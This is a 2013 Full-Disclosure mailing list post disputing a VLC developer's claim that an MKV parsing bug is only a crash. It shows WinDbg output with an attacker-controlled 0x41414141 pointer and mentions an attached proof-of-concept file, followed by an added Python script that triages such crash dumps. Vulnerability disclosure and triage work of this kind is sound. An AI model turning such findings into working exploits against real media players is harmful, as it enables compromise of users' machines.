Message-ID: <CADe7mMfrCftjJHX7k9O9QdZfR5J=UfmaRsiu6BJJ3QLvATxt3g@mail.gmail.com>
Date: Wed, 10 Jul 2013 03:03:25 +0430
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: VLC media player MKV Parsing POC

Hello list,
regarding the nonsense VLC post

http://www.jbkempf.com/blog/post/2013/More-lies-from-Secunia?pub=0#pr

1. we said that this was a crash, not an exploitable security issue

and the funny comment on the publication:

You forget to mention the most important thing: if Secunia Research is
professional, why don't they provide you with a working exploit (for example,
EIP = 0x41414141)? I'm sure a company like VUPEN would do just that to prove
their point. Isn't it worth pointing out on other sites (e.g. netsec)?
I really like this
https://twitter.com/Secunia/status/337140449712156672
You can spot _two_ lies: first, they didn't find ANY vuln; second, they're
lying about the timeframe.


Here is your VUPEN 0x41414141


ModLoad: 64fb0000 650d8000   C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll

(be8.f0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02b92a18 ebx=00890000 ecx=41414141 edx=00100000 esi=02bccbd8 edi=00890178
eip=77163fbb esp=04d1f324 ebp=04d1f348 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010283
ntdll!RtlImageNtHeader+0xe37:
77163fbb 8b11            mov     edx,dword ptr [ecx]  ds:002b:41414141=????????

0:010> g

(be8.f0c): Access violation - code c0000005 (!!! second chance !!!)
eax=02b92a18 ebx=00890000 ecx=41414141 edx=00100000 esi=02bccbd8 edi=00890178
eip=77163fbb esp=04d1f324 ebp=04d1f348 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010283
ntdll!RtlImageNtHeader+0xe37:
77163fbb 8b11            mov     edx,dword ptr [ecx]  ds:002b:41414141=????????

0:010> r ecx

ecx=41414141

0:010> d ecx
41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

POC included

Stay Secure

Regards
Kaveh


Download attachment "poc.mkv" of type "application/octet-stream" (16360 bytes)
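As an added crash-triage example (not code from the post, from VLC, or from Secunia), here is a small Python script that parses the WinDbg output above, decides whether the access violation is a read or a write, names the base register of the faulting memory operand, and flags a pointer value that looks like input bytes (the 0x41414141 pattern) or targets unmapped memory. The sample dump is the post's output with its wrapped lines rejoined; the result fields and the "controlled" heuristic are my own naming, not WinDbg or !exploitable output.

```python
import re

# Constructed sample: the WinDbg output from the post above, with the
# line-wrapped register rows rejoined onto single lines.
WINDBG_CRASH = """\
(be8.f0c): Access violation - code c0000005 (first chance)
eax=02b92a18 ebx=00890000 ecx=41414141 edx=00100000 esi=02bccbd8 edi=00890178
eip=77163fbb esp=04d1f324 ebp=04d1f348 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010283
ntdll!RtlImageNtHeader+0xe37:
77163fbb 8b11            mov     edx,dword ptr [ecx]  ds:002b:41414141=????????
"""

REG_RE = re.compile(r"\b(e(?:ax|bx|cx|dx|si|di|bp|sp|ip))=([0-9a-f]{8})\b")
# WinDbg disassembly line: "<addr> <opcode bytes> <mnemonic> <operands> [ds:...]"
INSN_RE = re.compile(r"^[0-9a-f]{8}\s+[0-9a-f]+\s+(\w+)\s+(.*?)\s*(?:ds:\S+)?\s*$", re.M)
MEM_RE = re.compile(r"\[(e[a-z]{2})(?:[+-][^\]]*)?\]")   # base register of [reg+...]
UNMAPPED_RE = re.compile(r"ds:[0-9a-f]+:[0-9a-f]+=\?{8}")  # WinDbg prints ???????? for unmapped memory

def parse_registers(dump):
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}

def looks_controlled(value):
    """Four identical bytes that are neither 0x00 nor 0xff (0x41414141 style)
    are the classic sign that bytes from the input file reached a register."""
    b = value.to_bytes(4, "little")
    return len(set(b)) == 1 and b[0] not in (0x00, 0xFF)

def triage(dump):
    """Classify a WinDbg access violation: read or write, through which base
    register, and whether that register's value looks input-controlled."""
    result = {"exception": "access violation" if "Access violation" in dump else "other",
              "access": "unknown", "pointer_reg": None, "pointer": None,
              "controlled": False, "target_mapped": not UNMAPPED_RE.search(dump)}
    m = INSN_RE.search(dump)
    if result["exception"] != "access violation" or not m:
        return result
    dst, _, src = m.group(2).partition(",")   # Intel syntax: destination,source
    mem = MEM_RE.search(dst) or MEM_RE.search(src)
    if mem:
        result["access"] = "write" if MEM_RE.search(dst) else "read"
        result["pointer_reg"] = mem.group(1)
        result["pointer"] = parse_registers(dump).get(mem.group(1))
        result["controlled"] = result["pointer"] is not None and looks_controlled(result["pointer"])
    return result
```

For the post's dump this yields a read through ecx of an unmapped, pattern-filled address; a write through a controlled pointer would be flagged the same way with "access" set to "write".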

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
